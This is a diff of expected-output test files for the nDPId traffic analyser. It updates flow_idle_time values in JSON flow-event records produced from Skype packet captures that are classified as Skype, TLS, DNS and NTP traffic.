-00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969727446,"flow_last_seen":1431969727738,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1352,"flow_tot_l4_payload_len":1524,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":50133,"dst_port":13392,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969727446,"flow_last_seen":1431969727738,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1352,"flow_tot_l4_payload_len":1524,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":50133,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00833{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":387,"flow_first_seen":1431969642444,"flow_last_seen":1431969808620,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":172532,"flow_avg_l4_payload_len":445,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":50028,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} +00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969725833,"flow_last_seen":1431969741920,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":50132,"dst_port":13392,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969725833,"flow_last_seen":1431969741920,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":50132,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969727446,"flow_last_seen":1431969727738,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1352,"flow_tot_l4_payload_len":1524,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":50133,"dst_port":13392,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969727446,"flow_last_seen":1431969727738,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1352,"flow_tot_l4_payload_len":1524,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":50133,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00833{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":387,"flow_first_seen":1431969642444,"flow_last_seen":1431969808620,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":172532,"flow_avg_l4_payload_len":445,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":50028,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} 00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1431969713813,"flow_last_seen":1431969733946,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.185.207.12","src_port":13021,"dst_port":45493,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969759543,"flow_last_seen":1431969759588,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.253.48.245","src_port":123,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}} 00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969642334,"flow_last_seen":1431969642400,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58681,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1431969792778,"flow_last_seen":1431969803795,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.53.51","src_port":50146,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1431969792778,"flow_last_seen":1431969803795,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.53.51","src_port":50146,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1431969792778,"flow_last_seen":1431969803795,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.53.51","src_port":50146,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1431969792778,"flow_last_seen":1431969803795,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.53.51","src_port":50146,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.43","src_port":13021,"dst_port":40002,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969678448,"flow_last_seen":1431969678448,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.26","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969687504,"flow_last_seen":1431969687504,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.29","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
@@ -1397,10 +1397,10 @@ 00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.25","src_port":13021,"dst_port":40028,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.24","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.20","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431969716182,"flow_last_seen":1431969728657,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":110,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.133.19.185","src_port":50122,"dst_port":44431,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431969716182,"flow_last_seen":1431969728657,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":110,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.133.19.185","src_port":50122,"dst_port":44431,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":22,"flow_first_seen":1431969717295,"flow_last_seen":1431969788791,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":7,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.133.19.185","src_port":50124,"dst_port":44431,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":22,"flow_first_seen":1431969717295,"flow_last_seen":1431969788791,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":7,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.133.19.185","src_port":50124,"dst_port":44431,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431969716182,"flow_last_seen":1431969728657,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":110,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.133.19.185","src_port":50122,"dst_port":44431,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431969716182,"flow_last_seen":1431969728657,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":110,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.133.19.185","src_port":50122,"dst_port":44431,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":22,"flow_first_seen":1431969717295,"flow_last_seen":1431969788791,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":7,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.133.19.185","src_port":50124,"dst_port":44431,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":22,"flow_first_seen":1431969717295,"flow_last_seen":1431969788791,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":7,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.133.19.185","src_port":50124,"dst_port":44431,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1431969713813,"flow_last_seen":1431969733946,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"176.26.55.167","src_port":13021,"dst_port":63773,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.152","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969691496,"flow_last_seen":1431969691496,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.155","src_port":13021,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
@@ -1462,8 +1462,8 @@ 00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969681480,"flow_last_seen":1431969681480,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.162","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969670418,"flow_last_seen":1431969670418,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969669408,"flow_last_seen":1431969669408,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.154","src_port":13021,"dst_port":40034,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969679451,"flow_last_seen":1431969698502,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":90,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.12","src_port":50065,"dst_port":40031,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969679451,"flow_last_seen":1431969698502,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":90,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.12","src_port":50065,"dst_port":40031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969679451,"flow_last_seen":1431969698502,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":90,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.12","src_port":50065,"dst_port":40031,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969679451,"flow_last_seen":1431969698502,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":90,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.12","src_port":50065,"dst_port":40031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00569{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","packets-captured":3284,"packets-processed":3069,"total-skipped-flows":0,"total-l4-data-len":444195,"total-not-detected-flows":61,"total-guessed-flows":32,"total-detected-flows":200,"total-detection-updates":7,"total-updates":0,"current-active-flows":0,"total-active-flows":293,"total-idle-flows":293,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":1467,"global_ts_msec":1431969808951} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 3284/3069 diff --git a/test/results/skype_no_unknown.pcap.out b/test/results/skype_no_unknown.pcap.out index 974337dcc..8b65e4a38 100644 
--- a/test/results/skype_no_unknown.pcap.out +++ b/test/results/skype_no_unknown.pcap.out 
@@ -29,28 +29,28 @@ 00801{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634669,"flow_last_seen":1431970634669,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1431970634669,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57694,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"db3msgr5011709.gateway.messenger.live.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1431970634723,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":166,"pkt_l4_len":132,"thread_ts_msec":1431970634723,"pkt":"PBXCt3IO0NQSxnP1CABFAACYAABAAEARtuHAqAEBwKgBIgA14V4AhKxSjTWBgAABAAAAAQAADkRCM01TR1I1MDExNzA5B2dhdGV3YXkJbWVzc2VuZ2VyBGxpdmUDY29tAAAcAAHALQAGAAEAAAbhADUDbnMxBG1zZnQDbmV0AAZtc25oc3QJbWljcm9zb2Z0wDJ4Gz7uAAAcIAAAA4QAJOoAAAAOEA=="} 
